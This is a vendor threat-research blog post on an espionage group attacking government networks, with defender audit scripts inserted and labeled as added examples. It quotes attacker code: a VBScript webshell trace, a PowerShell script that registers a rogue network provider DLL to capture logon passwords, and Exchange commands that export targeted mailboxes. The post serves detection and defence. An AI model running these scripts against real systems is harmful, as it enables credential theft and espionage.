# Through the Cortex XDR Lens: Uncovering a New Activity Group Targeting Governments in the Middle East and Africa

By [Lior Rochberger](https://www.paloaltonetworks.com/blog/author/lior-rochberger/?ts=markdown "Posts by Lior Rochberger"), Jun 14, 2023

## **Executive Summary**

The Cortex Threat Research team has recently identified multiple espionage attacks targeting governmental entities in the Middle East and Africa. According to our findings, the main goal of the attacks was to obtain highly confidential and sensitive information, specifically related to politicians, military activities, and ministries of foreign affairs.

The attacks, which happened around the same time frame, shared several highly distinctive similarities in tactics, techniques, and procedures (TTPs). Some of these techniques had never been reported before in the wild, while others are relatively rare, with only a handful of attackers reported using them. We currently track the activity group behind the attacks as CL-STA-0043. This activity group's level of sophistication, adaptiveness, and victimology suggests a highly capable APT threat actor, and it is suspected to be a nation-state threat actor.
While tracking and analyzing CL-STA-0043, we discovered new evasive techniques and tools used by the attackers, such as an in-memory VBS implant used to run a webshell clandestinely, as well as a rare credential theft technique seen in the wild for the first time. Perhaps one of the most interesting findings of this investigation is the rare and novel Exchange email exfiltration technique that the attackers used only on a few selected targets, according to our telemetry.

In this blog post, we provide information regarding the various TTPs observed in the attacks, including their execution as shown through the lens of the Palo Alto Networks Cortex XDR product.

## **Table of Contents**

* [Executive Summary](#post-296259-_zdjjbbl29xlf)
* [Table of Contents](#post-296259-_9qqpl1drpj3u)
* [Infection Vector: An In-Memory VBS Implant](#post-296259-_sohi76muwlzm)
* [Reconnaissance](#post-296259-_hhufnpm94x29)
* [Privilege Escalation](#post-296259-_u4d7ynxxul2t)
  * [The Potato Suite](#post-296259-_pzobie8bauoi)
  * [Sticky Keys Attack is Making a Comeback](#post-296259-_r4s8zoi2orfr)
  * [Iislpe IIS PE](#post-296259-_pk58stnfmsp)
* [Credential Theft: Using Network Providers To Steal Credentials](#post-296259-_8femf4oipi0)
* [Lateral Movement](#post-296259-_h7xx1aaw885z)
  * [Debuting Yasso: A New Penetration Toolset](#post-296259-_snpf19sx5vth)
  * [Additional Lateral Movement TTPs](#post-296259-_uz6x6qvputqy)
* [Exfiltration: Stealing Targeted Email Data](#post-296259-_bx60rk6zf59f)
  * [Abusing of the Exchange Management Shell](#post-296259-_aso1t99xk5zz)
  * [Add PowerShell snap-in (PSSnapins) to steal emails](#post-296259-_861di2qftgjg)
* [Conclusion](#post-296259-_3tgjtn57dmzm)
* [Protections and Mitigations](#post-296259-_mf3k1d3b3om7)
* [Indicators Of Compromise](#post-296259-_t9yewnvksov5)
* [Additional Resources](#post-296259-_eoura034lmtc)

## **Infection Vector: An In-Memory VBS Implant**

In the past couple of years, [multiple zero-day exploits](https://unit42.paloaltonetworks.com/proxynotshell-cve-2022-41040-cve-2022-41082/) in on-premises IIS and Microsoft Exchange Servers have led to a growing trend of exploiting these servers to gain initial access to target networks. In most cases, the main post-exploitation method observed in such attacks is to deploy various kinds of webshells, which give the attackers access to the compromised network via a remote shell.

During an investigation of one of the instances, we observed a series of failed attempts to execute the infamous [China Chopper](https://attack.mitre.org/software/S0020/) webshell, which were blocked by the Cortex XDR anti-webshell module. In the days following the failed attempts, we observed new suspicious activity originating from the Exchange Server's [w3wp.exe](https://stackify.com/w3wp-exe-iis-worker-process/) process, which upon investigation turned out to result from an in-memory VBScript implant deployed by the threat actor. This activity was also detected by Cortex XDR.

![Figure 1. Detection of the suspicious AMSI decode attempt, as shown in Cortex XDR.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-296259-1.png)

Figure 1. Detection of the suspicious AMSI decode attempt, as shown in Cortex XDR.
Below is a snippet of the in-memory VBScript, as captured by the AMSI trace (one COM call per line; redacted values appear as `\`):

```text
request.Item("\");
IStringList.Item();
IServer.ScriptTimeout("3600");
IServer.CreateObject("Scripting.Dictionary");
IRequest.Form("key");
IStringList.Item();
ISessionObject.Value("payload");
IXMLDOMNode._00000029("base64");
IXMLDOMElement.dataType("bin.base64");
IXMLDOMElement.text("\");
IXMLDOMElement.nodeTypedValue();
ISessionObject.Value("payload");
IDictionary.Add("payload", "Set Parameters=Server.CreateObject("Scripting.Dictionary") Function Base64Encode(sText) Dim oXML, oNode i");
IDictionary.Item("payload");
IServer.CreateObject("Scripting.Dictionary");
_Stream.Charset("iso-8859-1");
_Stream.Type("1");
_Stream.Open();
_Stream.Write("Unsupported parameter type 00002011");
_Stream.ReadText();
IServer.CreateObject("WScript.shell");
IWshShell3._00000000();
IWshShell3.Exec("cmd /c "cd /d "C:/\/"&ipconfig /all" 2>&1");
```

## **Reconnaissance**

Once the attackers had penetrated the network, they performed reconnaissance activity, mapping out the network and identifying critical assets. The attackers were mainly focused on finding administrative accounts and identifying important servers, such as:

* Domain controllers
* Web servers
* Exchange servers
* FTP servers
* SQL databases

To get this information, the attackers tried to execute the following tools:

* Ladon web scanning tool (authored by "[k8gege](https://k8gege.org/)")
* Custom network scanners
* Nbtscan
* Portscan
* Windows commands: netstat, nslookup, net, ipconfig, tasklist, quser

![Figure 2. Prevention of multiple tools by Cortex XDR & XSIAM](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-296259-2.png)

Figure 2. Prevention of multiple tools by Cortex XDR & XSIAM

## **Privilege Escalation**

### The Potato Suite

In order to carry out the attacks successfully, the threat actors needed to run their tools and commands with adequate privileges (admin/SYSTEM). To do so, they made use of different tools from the popular Potato suite, a collection of native Windows privilege escalation tools. The main tools observed during the investigation were:

* [JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG) - a local privilege escalation tool, from a Windows service account to NT AUTHORITY\SYSTEM. It is based on [RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG).
* [SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato) - a local privilege escalation tool using [EfsRpc](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31), built from [SweetPotato](https://github.com/CCob/SweetPotato).

Using those tools, the threat actor attempted to create administrative accounts and to run various tools that require elevated privileges.

![Figure 3. Prevention of JuicyPotatoNG by the Cortex XDR & XSIAM WildFire module](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-296259-3.png)

Figure 3. Prevention of JuicyPotatoNG by the Cortex XDR & XSIAM WildFire module

### Sticky Keys Attack is Making a Comeback

Another technique that we observed during the attacks was the well-known privilege escalation technique called "[Sticky Keys](https://attack.mitre.org/techniques/T1546/008/)". The Windows operating system contains accessibility features that can be launched with a key combination before a user has logged in to the system, or by an unprivileged user. An attacker can modify the way these programs are launched to get a command prompt or a backdoor. One of the common accessibility features is [sethc.exe](https://www.processlibrary.com/en/directory/files/sethc/28697/), often referred to as "Sticky Keys". In this attack, the attacker typically replaces the sethc.exe binary, or the registry references pointing to it, with cmd.exe. When the accessibility feature is triggered, it provides the attacker with an elevated command prompt to run arbitrary commands and other tools.

We observed multiple attempts to edit the registry key for sethc.exe to point to cmd.exe and subsequently run sethc.exe with the parameter "211". This turns on the system's "Sticky Keys" feature, which in turn executes the elevated command prompt.

![Figure 4. Prevention of Sticky Keys attack by Cortex XDR & XSIAM](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-296259-4.png)

Figure 4. Prevention of Sticky Keys attack by Cortex XDR & XSIAM

### Iislpe IIS PE

In addition, the attackers used the privilege escalation tool "Iislpe.exe", an IIS privilege escalation tool written by "k8gege", the same author who created the aforementioned Ladon tool.
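A defender-side check for the two Sticky Keys hijack variants described above, added here as an example and not part of the original post: it reads the IFEO `Debugger` value for each accessibility binary and compares the on-disk binary with cmd.exe. The list of accessibility executables beyond sethc.exe and the function name are ours.

```powershell
# Added example (not from the original post): audit the accessibility binaries
# Windows can launch from the logon screen for the two hijack variants the post
# describes - a registry redirect (IFEO "Debugger" value) and an on-disk
# replacement of the binary with cmd.exe. Run from an elevated PowerShell.
# Only sethc.exe is named in the post; the rest of the list is the standard
# accessibility set and is our assumption.

$AccessibilityBinaries = @(
    'sethc.exe',         # Sticky Keys (Shift x5)
    'utilman.exe',       # Ease of Access
    'osk.exe',           # On-Screen Keyboard
    'narrator.exe',
    'magnify.exe',
    'displayswitch.exe',
    'atbroker.exe'
)

$IfeoRoot = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

function Get-AccessibilityHijackFindings {
    [CmdletBinding()]
    param(
        [string[]] $Binaries = $AccessibilityBinaries,
        [string]   $System32 = (Join-Path $env:SystemRoot 'System32')
    )

    # Reference hash of the legitimate cmd.exe; a swapped accessibility binary
    # is usually a straight copy of it.
    $cmdHash = (Get-FileHash -Algorithm SHA256 -Path (Join-Path $System32 'cmd.exe')).Hash

    foreach ($bin in $Binaries) {
        # Variant 1: an IFEO Debugger value makes Windows start the "debugger"
        # instead of the accessibility tool. A default system has no IFEO key
        # for these binaries at all, so any Debugger value is a finding.
        $ifeoKey  = Join-Path $IfeoRoot $bin
        $debugger = (Get-ItemProperty -Path $ifeoKey -Name Debugger -ErrorAction SilentlyContinue).Debugger
        if ($debugger) {
            [pscustomobject]@{ Binary = $bin; Finding = 'IFEO Debugger set'; Detail = $debugger }
        }

        # Variant 2: the binary itself was replaced. Compare its hash with
        # cmd.exe and check that the embedded OriginalFilename still matches
        # (a copied cmd.exe reports "Cmd.Exe"; -ne is case-insensitive).
        $path = Join-Path $System32 $bin
        if (-not (Test-Path -LiteralPath $path)) { continue }
        $hash = (Get-FileHash -Algorithm SHA256 -Path $path).Hash
        $orig = (Get-Item -LiteralPath $path).VersionInfo.OriginalFilename
        if ($hash -eq $cmdHash) {
            [pscustomobject]@{ Binary = $bin; Finding = 'Binary is a copy of cmd.exe'; Detail = $path }
        }
        elseif ($orig -and ($orig -ne $bin)) {
            [pscustomobject]@{ Binary = $bin; Finding = 'OriginalFilename mismatch'; Detail = "$path reports $orig" }
        }
    }
}

$findings = @(Get-AccessibilityHijackFindings)
if ($findings.Count -eq 0) { 'No accessibility hijack indicators found.' }
else { $findings | Format-Table -AutoSize }
```

Any finding from this script is worth correlating with the Cortex alert shown in Figure 4 and with logon-screen activity around the same time, since the hijacked binary only pays off when someone triggers it at the logon prompt.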
## **Credential Theft: Using Network Providers To Steal Credentials**

In the attacks clustered under the CL-STA-0043 activity group, many techniques and tools were deployed to steal credentials, such as [Mimikatz](https://attack.mitre.org/software/S0002/), [dumping the SAM key](https://attack.mitre.org/techniques/T1003/), [forcing WDigest to store credentials in plaintext](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/forcing-wdigest-to-store-credentials-in-plaintext) and dumping the NTDS.dit file from Active Directory using [ntdsutil.exe](https://lolbas-project.github.io/lolbas/OtherMSBinaries/Ntdsutil/). These techniques are all well known and documented.

However, one technique did stand out, since it was first reported only as a [POC](https://www.socinvestigation.com/credential-dumping-using-windows-network-providers-how-to-respond/) (proof of concept) in August 2022, and up to the time of writing this report there were no public mentions of this technique being exploited in the wild. Using this method, the attackers executed a PowerShell script that registered a new network provider, named "ntos", set to execute a malicious DLL, ntos.dll, dropped by the attacker in the C:\Windows\system32 folder.
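Before looking at the attacker's registration script below, here is the defender's counterpart, added as an example and not part of the original post: it walks `PROVIDERORDER`, resolves each provider's DLL and flags any that is not a validly signed Microsoft file. The baseline list of built-in providers and the function name are our assumptions.

```powershell
# Added example (not from the original post): list every network provider that
# mpnotify.exe will hand logon credentials to, and flag providers whose DLL is
# not a validly signed Microsoft file. A provider registered the way the post
# describes (here "ntos" -> %SystemRoot%\System32\ntos.dll) shows up as an
# unsigned, non-baseline entry. Run from an elevated PowerShell.

# Built-in providers on a default Windows install; this is our own baseline,
# extend it for legitimate third-party providers (VPN or file-sync clients).
$BaselineProviders = @('RDPNP', 'LanmanWorkstation', 'webclient')

function Get-NetworkProviderAudit {
    [CmdletBinding()]
    param([string[]] $Baseline = $BaselineProviders)

    $orderKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order'
    $order    = (Get-ItemProperty -Path $orderKey -Name PROVIDERORDER).PROVIDERORDER

    # PROVIDERORDER is a comma-separated list of service names; the attacker's
    # script simply appended ",ntos" to it.
    $names = $order -split ',' | ForEach-Object { $_.Trim() } | Where-Object { $_ }

    foreach ($name in $names) {
        $npKey = "HKLM:\SYSTEM\CurrentControlSet\Services\$name\NetworkProvider"
        $props = Get-ItemProperty -Path $npKey -ErrorAction SilentlyContinue

        # ProviderPath is normally REG_EXPAND_SZ; Get-ItemProperty already
        # expands it, and expanding again is harmless.
        $dll = if ($props.ProviderPath) {
            [Environment]::ExpandEnvironmentVariables($props.ProviderPath)
        } else { $null }

        $status = 'DLL missing'
        $signer = $null
        if ($dll -and (Test-Path -LiteralPath $dll)) {
            $sig    = Get-AuthenticodeSignature -FilePath $dll
            $status = $sig.Status.ToString()
            $signer = $sig.SignerCertificate.Subject
        }

        # Flag anything that is not a validly signed Microsoft binary. The
        # baseline column is informational: a signed non-baseline provider is
        # probably third-party software, an unsigned one needs a look.
        [pscustomobject]@{
            Provider     = $name
            InBaseline   = ($Baseline -contains $name)
            ProviderPath = $dll
            Signature    = $status
            Signer       = $signer
            Suspicious   = (($status -ne 'Valid') -or ($signer -notmatch 'O=Microsoft Corporation'))
        }
    }
}

Get-NetworkProviderAudit | Sort-Object Suspicious -Descending | Format-Table -AutoSize
```

Because the provider DLL is loaded by mpnotify.exe at every interactive logon, removing a rogue entry means both deleting its `Services\<name>\NetworkProvider` key and taking the name back out of `PROVIDERORDER`; leaving either half behind keeps the hook alive or breaks logon notifications.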
```powershell
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER + ",ntos"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\ntos
New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\ntos\NetworkProvider
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ntos\NetworkProvider -Name "Class" -Value 2
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ntos\NetworkProvider -Name "Name" -Value ntos
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ntos\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\ntos.dll"
```

As part of the logon process, Winlogon.exe captures the username and password and forwards them to mpnotify.exe, which loads the malicious DLL and passes it the cleartext password. The malicious DLL then creates a new file containing the stolen credentials, which is later sent to the attackers' command and control (C2) server.

![Figure 5. Prevention of the credential theft attempt, as shown in Cortex XDR & XSIAM.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-296259-5.png)

Figure 5. Prevention of the credential theft attempt, as shown in Cortex XDR & XSIAM.

## **Lateral Movement**

### Debuting Yasso: A New Penetration Toolset

As part of the investigation of the activity in CL-STA-0043, we observed the use of a relatively new penetration testing toolset, "[Yasso](https://github.com/LYingSiMon/Yasso)". Interestingly, although this tool has been publicly available since January 2022, at the time of this report there were no publicly reported cases of it being used in the wild. Yasso, authored by a Mandarin-speaking pentester nicknamed [Sairson](https://github.com/sairson), is an open source, multi-platform, intranet-assisted penetration toolset that brings together a number of features such as scanning, brute forcing, a remote interactive shell, and running arbitrary commands. In addition, Yasso has powerful SQL penetration functions and provides a range of database functionalities for the operator to perform remote actions.

![Figure 6. Yasso command line tool.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-296259-6.png)

Figure 6. Yasso command line tool.

The following Yasso modules were most in use during the attacks:

* **SMB** - SMB service brute-force module
* **Winrm** - WinRM service brute-force module
* **SSH** - SSH service brute-force module, with a fully interactive shell connection
* **MSSQL** - SQL Server service brute-force module and privilege escalation auxiliary module

The use of the different Yasso modules was detected by Cortex XDR & XSIAM, as shown in Figure 7.

![Figure 7. Detection of the Yasso tool execution, as shown in Cortex XDR & XSIAM.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-296259-7.png)

Figure 7. Detection of the Yasso tool execution, as shown in Cortex XDR & XSIAM.
Those modules, in combination with text files containing target endpoints, usernames and passwords, were used to perform an [NTLM spray attack](https://attack.mitre.org/techniques/T1110/003/). In this attack, the attacker tried to log in to multiple servers using different combinations of multiple users and passwords in a short period of time. The [Identity Analytics](https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/techbriefs/cortex-xdr-identity-analytics) module of Cortex XDR & XSIAM detected the anomaly and raised multiple alerts for the suspicious behavior, as shown in Figure 8.

![Figure 8. Detection by the Identity Analytics module of the NTLM spray attack, as shown in Cortex XDR & XSIAM.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-296259-8.png)

Figure 8. Detection by the Identity Analytics module of the NTLM spray attack, as shown in Cortex XDR & XSIAM.

### Additional Lateral Movement TTPs

Besides the use of Yasso for lateral movement, the attackers were also observed using other common and well-known techniques for the same purpose. The tools observed were mostly native Windows tools such as WMI, scheduled tasks, [Winrs](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/winrs) and Net. In addition, the use of [Samba smbclient](https://www.samba.org/samba/docs/current/man-html/smbclient.1.html) for lateral movement was observed in some instances.

## **Exfiltration: Stealing Targeted Email Data**

One of the most interesting techniques observed in the attacks was the targeted data exfiltration method used on the compromised Exchange servers. A variation of this technique was previously reported as used by [Hafnium](https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/).
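The rest of this section describes two ways the attackers pulled mail out of Exchange: Exchange Management Shell command lines loaded through exshell.psc1, and scripts that add the Exchange snap-in and call New-MailboxExportRequest, both writing their output under c:\users\public. As an added example, not from the original post, this PowerShell function triages process command lines for that combination; the indicator names, the regexes and the constructed sample events are ours.

```powershell
# Added example (not from the original post): triage process command lines for
# the two Exchange mail-collection patterns described in this section - the
# Exchange Management Shell loaded via -psconsolefile, and scripts that load the
# Exchange snap-in and call New-MailboxExportRequest - combined with output
# written to a staging path such as c:\users\public. Indicator names, regexes
# and sample events are ours; the events are constructed, not real telemetry.

$ExchangeCollectionIndicators = @(
    @{ Category = 'EntryPoint'; Name = 'exshell.psc1 console file';
       Pattern  = '-psconsolefile\s+.*?exshell\.psc1' },
    @{ Category = 'EntryPoint'; Name = 'Exchange snap-in added';
       Pattern  = 'Add-PSSnapin\s+Microsoft\.Exchange\.Management' },
    @{ Category = 'Collection'; Name = 'Mailbox export to PST';
       Pattern  = '\bNew-MailboxExportRequest\b' },
    @{ Category = 'Collection'; Name = 'Mailbox / tracking-log enumeration';
       Pattern  = '\b(Get-Mailbox|Get-MailboxStatistics|Get-MessageTrackingLog)\b' },
    @{ Category = 'Staging';    Name = 'Output to public or admin-share path';
       Pattern  = '(export-csv|-FilePath)\s+.*?(\\users\\public|\\c\$\\)' }
)

function Test-ExchangeCollectionCommandLine {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string] $CommandLine)

    # -match is case-insensitive by default, which suits the mixed casing seen
    # in the captured command lines (get-mailbox, Get-MessageTrackingLog).
    $hits       = @($ExchangeCollectionIndicators | Where-Object { $CommandLine -match $_.Pattern })
    $categories = @($hits | ForEach-Object { $_.Category } | Select-Object -Unique)

    # Reading mailboxes from the management shell is routine admin work; the
    # activity in the post pairs collection with an export to a staging path.
    $verdict = if (($categories -contains 'Staging') -and ($categories -contains 'Collection')) { 'SUSPICIOUS' }
               elseif (($categories -contains 'EntryPoint') -and ($categories -contains 'Collection')) { 'REVIEW' }
               else { 'benign' }

    [pscustomobject]@{
        Verdict     = $verdict
        Indicators  = @($hits | ForEach-Object { $_.Name })
        CommandLine = $CommandLine
    }
}

# Constructed sample events. The second and fourth mirror the shape of the
# command lines quoted in this section, with mailbox and file names invented.
$SampleCommandLines = @(
    'powershell.exe -psconsolefile "C:\Program Files\Microsoft\Exchange Server\V15\bin\exshell.psc1" -command "Get-Mailbox -ResultSize 10"',
    'powershell.exe -psconsolefile "C:\Program Files\Microsoft\Exchange Server\V15\bin\exshell.psc1" -command "get-mailbox -Filter \"UserPrincipalName -Like \"*foreign*\"\" -ResultSize Unlimited | get-mailboxstatistics | export-csv c:\users\public\stats.csv"',
    'powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\Libraries\collect.ps1',
    'powershell.exe -c "Add-PSSnapin Microsoft.Exchange.Management.Powershell.E2010; New-MailboxExportRequest -Name Request1 -Mailbox ''embassy.paris'' -FilePath \"\\EXCH01\c$\users\public\libraries\embassy.paris.pst\""'
)

$SampleCommandLines | ForEach-Object { Test-ExchangeCollectionCommandLine -CommandLine $_ } |
    Format-Table Verdict, Indicators -AutoSize -Wrap
```

The third sample shows the limit of command-line triage: a script file that loads the snap-in leaves nothing on the command line, so the second method in this section is better caught with PowerShell script block logging (event ID 4104) or by reviewing the Exchange server's own `Get-MailboxExportRequest` history for exports to unusual paths.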
The exfiltration activity consists of abusing the Exchange Management Shell or PowerShell scripts in order to steal emails and PST files matching specific keywords that the threat actors deem important. To gather those emails, two very distinctive methods were observed:

* Abuse of the Exchange Management Shell
* Adding PowerShell snap-ins (PSSnapins) to steal emails through a script

![Figure 9. Prevention of the Exchange Management Shell abuse, as shown in Cortex XDR & XSIAM.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-296259-9.png)

Figure 9. Prevention of the Exchange Management Shell abuse, as shown in Cortex XDR & XSIAM.

### Abusing of the Exchange Management Shell

In the first method, we observed the abuse of the Exchange Management Shell (exshell.psc1) to run commands that saved all emails from users whose names contain the string "foreign", and all emails sent from or to governmental accounts, into CSV files (redacted file and domain names appear as `\`):

```powershell
powershell.exe -psconsolefile "C:\Program files\microsoft\exchange server\v15\bin\exshell.psc1" -command "get-mailbox -Filter \"UserPrincipalName -Like \"*foreign*\"\" -ResultSize Unlimited | get-mailboxstatistics | sort-object TotalItemSize -Descending | Select-Object DisplayName,Alias,TotalItemSize -First 30 | export-csv c:\users\public\\\.csv"
```

```powershell
powershell.exe -psconsolefile "C:\Program files\microsoft\exchange server\v15\bin\exshell.psc1" -command "Get-MessageTrackingLog -ResultSize Unlimited | Where-Object {$_.Recipients -like \"*@\.gov.\"}| select-object Sender,{$_.Recipients},{$_.MessageSubject} | export-csv c:\users\public\\\.csv"
```

```powershell
powershell.exe -psconsolefile "C:\Program files\microsoft\exchange server\v15\bin\exshell.psc1" -command "Get-MessageTrackingLog -ResultSize Unlimited | Where-Object {$_.sender -like \"*@\.gov.\"}| select-object Sender,{$_.Recipients},{$_.MessageSubject} | export-csv c:\users\public\\\.csv"
```

In addition to the command lines above, other searches for specific content (using the filter `($_.MessageSubject -like '*\*')`) were observed as well. Those searches targeted very specific individuals and information related to highly sensitive state and foreign policy matters.

### Add PowerShell snap-in (PSSnapins) to steal emails

In the second method, we observed the execution of multiple PowerShell scripts that add the Exchange [PowerShell snap-ins](https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_pssnapins?view=powershell-5.1), allowing the attackers to manage the Exchange server and steal emails. Below is a snippet of the script, which originally contained over 30 targeted mailboxes of individuals, embassies, military-related organizations, and others.
```powershell
$date=(Get-Date).AddDays(-3);
$server=$env:computername;
$path="\\$server\c$\users\public\libraries\" + [Guid]::newGuid().ToString();
mkdir $path;
Add-PSSnapin Microsoft.Exchange.Management.Powershell.E2010;
$culture = [System.Globalization.CultureInfo]::CreateSpecificCulture("en-US");
$culture.NumberFormat.NumberDecimalSeparator = ".";
$culture.NumberFormat.NumberGroupSeparator = ",";
[System.Threading.Thread]::CurrentThread.CurrentCulture = $culture;
$filter = "(Received -ge'$date') -or (Sent -ge'$date')";
New-MailboxExportRequest -Name Request1 -Mailbox '.atlanta' -ContentFilter $filter -FilePath "$path\.atlanta.pst";
New-MailboxExportRequest -Name Request2 -Mailbox '.Kuwait' -ContentFilter $filter -FilePath "$path\.Kuwait.pst";
New-MailboxExportRequest -Name Request3 -Mailbox '.Ankara' -ContentFilter $filter -FilePath "$path\.Ankara.pst";
New-MailboxExportRequest -Name Request4 -Mailbox '.Paris' -ContentFilter $filter -FilePath "$path\.Paris.pst";
New-MailboxExportRequest -Name Request5 -Mailbox 'permanentsecretary' -ContentFilter $filter -FilePath "$path\permanentsecretary.pst";
# New-MailboxExportRequest -Name Request6 -Mailbox ' Press Office' -ContentFilter $filter -FilePath "$path\.Press.Office.pst";
```

The output of those scripts was saved into .tiff files under "c:\users\public\", which were later compressed, password-protected and sent to the attackers' C2 server as well.

![Figure 10. Exchange Management Shell abuse, as shown in Cortex XDR & XSIAM.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-296259-10.png)

Figure 10. Exchange Management Shell abuse, as shown in Cortex XDR & XSIAM.

![Figure 11. Identity Analytics alert for a 7-Zip process accessing Outlook files, as shown in Cortex XDR & XSIAM.](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-296259-11.png)

Figure 11. Identity Analytics alert for a 7-Zip process accessing Outlook files, as shown in Cortex XDR & XSIAM.

## **Conclusion**

In this blog, we uncovered several previously unreported and rare techniques and tools observed in use by a cluster of activity we refer to as CL-STA-0043. While the research is still ongoing and the full identity of the threat actor(s) is still being studied, we believe that the level of sophistication, determination and espionage motives demonstrated in this report bear the hallmarks of a true advanced persistent threat, potentially operating on behalf of nation-state interests. In the same vein, this sheds light on how threat actors seek to obtain non-public and confidential information about geopolitical topics and high-ranking public service individuals.

## **Protections and Mitigations**

During the attacks, Cortex XDR & XSIAM raised many alerts for the malicious activities observed in CL-STA-0043. Prevention and detection alerts were raised for each phase of the attack: the initial access attempts, the use of rare tools and advanced techniques, and the data exfiltration attempts. [SmartScore](https://www.paloaltonetworks.com/blog/security-operations/beating-alert-fatigue-with-cortex-xdr-smartscore-technology/), a unique ML-driven scoring engine that translates security investigation methods and their associated data into a hybrid scoring system, gave this incident a score of 100, the highest level of risk.

![Figure 12. SmartScore information about the incident](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/06/word-image-296259-12.png)

Figure 12. SmartScore information about the incident

For Palo Alto Networks customers, our products and services provide the following coverage associated with this group:

[Cortex XDR](https://www.paloaltonetworks.com/cortex/cortex-xdr?_gl=1*13pmp8e*_ga*NzQyNjM2NzkuMTY2NjY3OTczNw..*_ga_KS2MELEEFC*MTY2OTczNjA2MS4zMS4wLjE2Njk3MzYwNjEuNjAuMC4w) detects user and credential-based threats by analyzing user activity from multiple data sources, including endpoints, network firewalls, Active Directory, identity and access management solutions, and cloud workloads. It builds behavioral profiles of user activity over time with machine learning. By comparing new activity to past activity, peer activity, and the expected behavior of the entity, Cortex XDR detects anomalous activity indicative of credential-based attacks. It also offers the following protections related to the attacks discussed in this post:

* Prevents the execution of known malware and also prevents the execution of unknown malware using [Behavioral Threat Protection](https://www.paloaltonetworks.com/products/secure-the-network/subscriptions/threat-prevention?_gl=1*13pmp8e*_ga*NzQyNjM2NzkuMTY2NjY3OTczNw..*_ga_KS2MELEEFC*MTY2OTczNjA2MS4zMS4wLjE2Njk3MzYwNjEuNjAuMC4w) and machine learning based on the Local Analysis module.
* Protects against credential gathering tools and techniques using the new Credential Gathering Protection available from Cortex XDR 3.4.
* Protects from threat actors dropping and executing commands from webshells using Anti Webshell Protection, newly released in Cortex XDR 3.4.
* Protects against exploitation of different vulnerabilities including ProxyShell and ProxyLogon using the Anti-Exploitation modules as well as Behavioral Threat Protection.
* Cortex XDR Pro [detects post-exploit activity](https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/analytics-alerts-by-required-data-source), including credential-based attacks, with behavioral analytics.

If you think you may have been impacted or have an urgent matter, get in touch with the [Unit 42 Incident Response team](http://start.paloaltonetworks.com/contact-unit42.html?_gl=1*13pmp8e*_ga*NzQyNjM2NzkuMTY2NjY3OTczNw..*_ga_KS2MELEEFC*MTY2OTczNjA2MS4zMS4wLjE2Njk3MzYwNjEuNjAuMC4w) or call:

* North America Toll-Free: 866.486.4842 (866.4.UNIT42)
* EMEA: +31.20.299.3130
* APAC: +65.6983.8730
* Japan: +81.50.1790.0200

## **Indicators Of Compromise**

| Tool | SHA256 |
| --- | --- |
| Yasso | 6b37aec6253c336188d9c8035e90818a139e3425c6e590734f309bd45021f980 |
| Credential Dumping Tool (sam.exe) | 77a3fa80621af4e1286b9dd07edaa37c139ca6c18e5695bc9b2c644a808f9d60 |
| iislpe.exe | 73b9cf0e64be1c05a70a9f98b0de4925e62160e557f72c75c67c1b8922799fc4 |
| SMBexec | E781ce2d795c5dd6b0a5b849a414f5bd05bb99785f2ebf36edb70399205817ee |
| nbtscan | 0f22e178a1e1d865fc31eb5465afbb746843b223bfa0ed1f112a02ccb6ce3f41 |
| Ladon | 291bc4421382d51e9ee42a16378092622f8eda32bf6b912c9a2ce5d962bcd8f4 |
| Ladon | aa99ae823a3e4c65969c1c3aa316218f5829544e4a433a4bab9f21df11d16154 |
| Ladon | ddcf878749611bc8b867e99d27f0bb8162169a8596a0b2676aa399f0f12bcbd7 |
| ntos.dll | bcd2bdea2bfecd09e258b8777e3825c4a1d98af220e7b045ee7b6c30bf19d6df |

## Additional Resources

* [Hunting for the Recent Attacks Targeting Microsoft Exchange](https://www.paloaltonetworks.com/blog/security-operations/attacks-targeting-microsoft-exchange/)
* [Stopping "PowerShell without PowerShell" Attacks](https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/)
* [Detecting Credential Stealing with Cortex XDR](https://www.paloaltonetworks.com/blog/security-operations/detecting-credential-stealing-with-cortex-xdr/)
* [Credential Gathering From Third-Party Software](https://unit42.paloaltonetworks.com/credential-gathering-third-party-software/)
* [Analyzing Attacks Against Microsoft Exchange Server With China Chopper Webshells](https://unit42.paloaltonetworks.com/china-chopper-webshell/)
